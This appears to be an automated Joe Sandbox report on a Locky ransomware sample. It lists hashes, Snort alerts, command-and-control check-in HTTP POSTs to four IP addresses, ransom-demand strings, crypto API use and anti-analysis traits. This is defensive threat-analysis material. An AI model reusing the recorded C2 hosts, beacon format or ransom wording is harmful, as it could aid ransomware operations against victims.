Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LockyRansom.exe

Overview

General Information

Sample name:LockyRansom.exe
Analysis ID:1446225
MD5:1720b1748ad7b8ac0bfc1c3636fead95
SHA1:97bae63417df5bde4a05cd44c6c523db50f6ab76
SHA256:3329641a171508fa6b1ad7674b31431093d46be190d1a51acd77e486f42d9c8e
Tags:exeLockyRansomware
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
AI detected suspicious sample
Found evasive API chain (may stop execution after checking locale)
Found potential ransomware demand text
Machine Learning detection for sample
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • LockyRansom.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\LockyRansom.exe" MD5: 1720B1748AD7B8AC0BFC1C3636FEAD95)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:05/23/24-01:13:30.810315
SID:2023551
Source Port:49704
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:13:53.178351
SID:2023551
Source Port:49706
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:13:53.178351
SID:2023577
Source Port:49706
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:13:53.178351
SID:2023552
Source Port:49706
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:13:52.300122
SID:2023551
Source Port:49705
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:13:52.300122
SID:2023552
Source Port:49705
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:13:52.300122
SID:2023577
Source Port:49705
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:14.647859
SID:2023552
Source Port:49708
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:36.143686
SID:2023577
Source Port:49709
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:58.402198
SID:2023551
Source Port:49711
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:14.647859
SID:2023551
Source Port:49708
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:57.599658
SID:2023577
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:58.402198
SID:2023552
Source Port:49711
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:36.143686
SID:2023552
Source Port:49709
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:36.143686
SID:2023551
Source Port:49709
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:58.402198
SID:2023577
Source Port:49711
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:14.647859
SID:2023577
Source Port:49708
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:57.599658
SID:2023551
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:14:57.599658
SID:2023552
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:13:30.810315
SID:2023577
Source Port:49704
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:05/23/24-01:13:30.810315
SID:2023552
Source Port:49704
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: LockyRansom.exeAvira: detected
Source: LockyRansom.exeReversingLabs: Detection: 95%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: LockyRansom.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00415310 GetLastError,__CxxThrowException@8,CryptAcquireContextA,0_2_00415310
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,0_2_00415410
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00416170 CryptReleaseContext,CryptDestroyKey,0_2_00416170
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_004193D8 CryptReleaseContext,0_2_004193D8
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,0_2_0041544C
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040F8D0 CryptReleaseContext,0_2_0040F8D0
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040F890 CryptReleaseContext,0_2_0040F890
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040F8B8 CryptReleaseContext,0_2_0040F8B8
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040F980 CryptGenRandom,__CxxThrowException@8,GetLastError,0_2_0040F980
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040FB50 CryptDestroyKey,0_2_0040FB50
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040FB10 CryptDestroyKey,0_2_0040FB10
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040FBF0 __CxxThrowException@8,CryptEncrypt,GetLastError,0_2_0040FBF0

Compliance

barindex
Source: C:\Users\user\Desktop\LockyRansom.exeUnpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack
Source: LockyRansom.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: gefas.pdb source: LockyRansom.exe
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0042D5D0 FindClose,FindFirstFileW,0_2_0042D5D0

Networking

barindex
Source: TrafficSnort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49704 -> 185.179.190.31:80
Source: TrafficSnort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49704 -> 185.179.190.31:80
Source: TrafficSnort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49704 -> 185.179.190.31:80
Source: TrafficSnort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49705 -> 37.143.9.154:80
Source: TrafficSnort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49705 -> 37.143.9.154:80
Source: TrafficSnort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49705 -> 37.143.9.154:80
Source: TrafficSnort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49706 -> 46.17.44.153:80
Source: TrafficSnort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49706 -> 46.17.44.153:80
Source: TrafficSnort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49706 -> 46.17.44.153:80
Source: TrafficSnort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49708 -> 46.183.165.45:80
Source: TrafficSnort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49708 -> 46.183.165.45:80
Source: TrafficSnort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49708 -> 46.183.165.45:80
Source: TrafficSnort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49709 -> 185.179.190.31:80
Source: TrafficSnort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49709 -> 185.179.190.31:80
Source: TrafficSnort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49709 -> 185.179.190.31:80
Source: TrafficSnort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49710 -> 37.143.9.154:80
Source: TrafficSnort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49710 -> 37.143.9.154:80
Source: TrafficSnort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49710 -> 37.143.9.154:80
Source: TrafficSnort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49711 -> 46.17.44.153:80
Source: TrafficSnort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49711 -> 46.17.44.153:80
Source: TrafficSnort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49711 -> 46.17.44.153:80
Source: Joe Sandbox ViewASN Name: ASBAXETRU ASBAXETRU
Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
Source: Joe Sandbox ViewASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU IHCRUInternet-HostingLtdMoscowRussiaRU
Source: Joe Sandbox ViewASN Name: WEBHOST1-ASRU WEBHOST1-ASRU
Source: global trafficHTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://37.143.9.154/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 37.143.9.154Content-Length: 613Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://46.17.44.153/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.17.44.153Content-Length: 613Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://46.183.165.45/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.183.165.45Content-Length: 613Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://37.143.9.154/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 37.143.9.154Content-Length: 613Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://46.17.44.153/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.17.44.153Content-Length: 613Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknownTCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknownTCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknownTCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknownTCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknownTCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknownTCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknownTCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknownTCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknownTCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknownTCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknownTCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknownTCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknownTCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknownHTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.179.190.31/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.179.190.31/imageload.cgin
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.179.190.31/imageload.cgir
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.143.9.154/imag=
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.143.9.154/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.143.9.154/imageload.cgiC
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.143.9.154/imageload.cgiP
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.143.9.154/imageload.cgid
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.143.9.154/imageload.cgii
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.143.9.154/imageload.cgilh
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.143.9.154/imageload.cgiy
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.153
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.153/
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.153/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.153/imageload.cgi0
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.153/imageload.cgi0.31/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.153/imageload.cgiL
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.153/imageload.cgiP
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.153/imageload.cgiV
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.153/imageload.cgii
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.153/imageload.cgik
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.153/imageload.cgiy3
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.17.44.1531oad.cgi%880
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.183.165.45/
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.183.165.45/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.183.165.45/imageload.cgia-deddda976288
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/download/download-easy.html

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : All of your files are encrypted with RSA-2048 and AES-128 ciphers.
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : Decrypting of your files is only possible with the private key and decrypt program, which is on our secret server.
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : To receive your private key follow one of the links:
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,0_2_00415410
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,0_2_0041544C
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_004022D00_2_004022D0
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040A58C0_2_0040A58C
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_004029C00_2_004029C0
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040B2C40_2_0040B2C4
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040940E0_2_0040940E
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040995F0_2_0040995F
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00409EB00_2_00409EB0
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: String function: 004182C0 appears 33 times
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: String function: 004761A0 appears 36 times
Source: LockyRansom.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal96.rans.evad.winEXE@1/0@0/4
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040CC4E CoCreateInstance,0_2_0040CC4E
Source: C:\Users\user\Desktop\LockyRansom.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: LockyRansom.exeReversingLabs: Detection: 95%
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: mciwave.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: gfiwave.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: LockyRansom.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: gefas.pdb source: LockyRansom.exe

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\LockyRansom.exeUnpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack .text:ER;.rdata:EW;.dec:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;.cdata:R;
Source: C:\Users\user\Desktop\LockyRansom.exeUnpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004079B0
Source: LockyRansom.exeStatic PE information: section name: .dec
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00404705 push ecx; ret 0_2_00404718
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_004029AB push ecx; ret 0_2_004029BB
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_00401408 push eax; ret 0_2_00401426
Source: LockyRansom.exeStatic PE information: section name: .rdata entropy: 7.910838175775477
Source: C:\Users\user\Desktop\LockyRansom.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\LockyRansom.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-30147
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0040C58C rdtsc 0_2_0040C58C
Source: C:\Users\user\Desktop\LockyRansom.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-30143
Source: C:\Users\user\Desktop\LockyRansom.exeAPI coverage: 7.7 %
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\LockyRansom.exeCode function: 0_2_0042D5D0 FindClose,FindFirstFileW,0_2_0042D5D0
